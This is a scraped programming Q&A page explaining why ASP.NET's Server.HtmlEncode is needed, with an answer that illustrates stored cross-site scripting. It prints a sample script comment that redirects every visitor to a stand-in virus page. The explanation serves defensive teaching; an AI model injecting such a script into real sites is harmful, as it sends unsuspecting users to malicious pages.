I am n开发者_如何学JAVAot able to understand why Server.HtmlEncode is required? MSDN states that it is used to encode potentially unsafe characters into HTML-encoded equivalent.
Can someone give me some idea how these characters are unsafe and require us to use Server.HtmlEncode ?
Thanks.
One example of how characters can be unsafe is if the user submits a comment on your page. If the comment form does not use HtmlEncode then anything the user has just typed will now be visible as a comment on the page. In that case, a hacker could submit a comment like the following:
<script language="javascript" type="text/javascript">
window.location = 'http://server.com/viruspage.asp';
</script>
For each subsequent user who loads the page, the script will run (because it hasn't been encoded with HtmlEncode), redirecting each user to a page with viruses. This is a very simple example, but there are many other ways to input malicious data, potentially even giving hackers administrative access to your databases.
![Interactive visualization of a graph in python [closed]](https://www.devze.com/res/2023/04-10/09/92d32fe8c0d22fb96bd6f6e8b7d1f457.gif)
加载中,请稍侯......
精彩评论